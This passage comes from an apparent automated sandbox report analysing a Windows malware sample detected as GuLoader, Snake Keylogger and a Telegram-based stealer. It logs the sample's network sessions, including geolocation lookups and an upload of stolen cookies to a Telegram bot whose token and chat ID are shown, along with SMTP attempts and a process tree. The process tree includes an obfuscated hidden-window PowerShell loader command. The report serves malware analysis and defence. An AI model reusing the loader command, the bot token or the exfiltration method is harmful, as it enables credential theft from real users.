cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1561&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1870595&cwnd=232&unsent_bytes=0&cid=5d9da7438f8d2fc3&ts=174&x=0"
2025-02-19 10:43:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49961	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-19 10:43:41 UTC	860	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193589 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNRg5v34%2FVd0HOz%2FXU%2BXLMGtb%2Fu1l8mBgNdYVhxHNR1P4XE45wEi10vOWYcaxRpXL4ittOi55K5PCUskiq4Xu%2FLG8oLPfG0D1YPQdaDzu%2BXme1eEVemcgRbhMN8Q9uQV0AgkfU3n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a845a9fd0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1444&rtt_var=572&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1864623&cwnd=216&unsent_bytes=0&cid=f1b50ad4a3c420da&ts=150&x=0"
2025-02-19 10:43:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49977	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:43 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-19 10:43:43 UTC	860	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193592 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1Q658PqbPHA3YVDlNf3mWLKM0%2BqNL1cgXXo9wv0hGvgf%2BFvU%2F5NoWQi2DAMq%2B5%2FiQxmWnoERSFOwOS62ohDZDOW2xgIm7Q54d0Nzbh7%2BZeUz0iBe0KfEeIsln4elLH96MNaeI0N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a854dea51899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1706&rtt_var=654&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1655328&cwnd=187&unsent_bytes=0&cid=91f76b53eefdc65b&ts=154&x=0"
2025-02-19 10:43:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49983	149.154.167.220	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:44 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2020/02/2025%20/%2005:05:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-02-19 10:43:44 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 19 Feb 2025 10:43:44 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-02-19 10:43:44 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50027	149.154.167.220	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:57 UTC	374	OUT	POST /bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendDocument?chat_id=5039346757&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd51ed5ac3d78c Host: api.telegram.org Content-Length: 7046 Connection: Keep-Alive
2025-02-19 10:43:57 UTC	7046	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 31 65 64 35 61 63 33 64 37 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 31 36 39 33 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 32 2f 32 30 32 35 20 2f Data Ascii: --------------------------8dd51ed5ac3d78cContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:116938Date and Time: 19/02/2025 /
2025-02-19 10:43:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 19 Feb 2025 10:43:58 GMT Content-Type: application/json Content-Length: 507 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-02-19 10:43:58 UTC	507	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 39 30 37 37 34 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6e 69 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 46 61 74 67 65 65 6d 6f 6e 69 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 30 33 39 33 34 36 37 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 65 73 73 65 64 53 69 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 39 39 36 31 38 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 Data Ascii: {"ok":true,"result":{"message_id":808,"from":{"id":7855907741,"is_bot":true,"first_name":"Moni_bot","username":"Fatgeemoni_bot"},"chat":{"id":5039346757,"first_name":"BlessedSin","type":"private"},"date":1739961838,"document":{"file_name":"Cookies_Recover

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 19, 2025 11:43:51.843477964 CET	587	50025	199.188.200.194	192.168.2.4	220-server243.web-hosting.com ESMTP Exim 4.96.2 #2 Wed, 19 Feb 2025 05:43:51 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 19, 2025 11:43:51.843698025 CET	50025	587	192.168.2.4	199.188.200.194	EHLO 116938
Feb 19, 2025 11:43:52.007817984 CET	587	50025	199.188.200.194	192.168.2.4	250-server243.web-hosting.com Hello 116938 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Feb 19, 2025 11:43:52.010478973 CET	50025	587	192.168.2.4	199.188.200.194	STARTTLS
Feb 19, 2025 11:43:52.183402061 CET	587	50025	199.188.200.194	192.168.2.4	220 TLS go ahead
Feb 19, 2025 11:43:54.741585970 CET	587	50026	199.188.200.194	192.168.2.4	220-server243.web-hosting.com ESMTP Exim 4.96.2 #2 Wed, 19 Feb 2025 05:43:54 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 19, 2025 11:43:54.741971016 CET	50026	587	192.168.2.4	199.188.200.194	EHLO 116938
Feb 19, 2025 11:43:54.909228086 CET	587	50026	199.188.200.194	192.168.2.4	250-server243.web-hosting.com Hello 116938 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Feb 19, 2025 11:43:54.909555912 CET	50026	587	192.168.2.4	199.188.200.194	STARTTLS
Feb 19, 2025 11:43:55.074475050 CET	587	50026	199.188.200.194	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	05:42:07
Start date:	19/02/2025
Path:	C:\Users\user\Desktop\000027_A-000032.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\000027_A-000032.exe"
Imagebase:	0x400000
File size:	794'310 bytes
MD5 hash:	E9FE3937A3A7C10E6A7554F24DEEA7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:42:08
Start date:	19/02/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)"
Imagebase:	0x4e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2336215560.0000000008F9D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:42:08
Start date:	19/02/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:43:13
Start date:	19/02/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xcd0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 000027_A-000032.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bikm4whm.q5d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0xxl0c2.l2z.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2m2wppz.2ka.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycwkpjgz.5ti.ps1

C:\Users\user\AppData\Local\Temp\nsgE3F9.tmp

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Bergenserne.dad

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Betoya.jpg

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\combustible.jpg

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\fiberglas.txt

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\gribbenes.txt

Windows Analysis Report
000027_A-000032.exe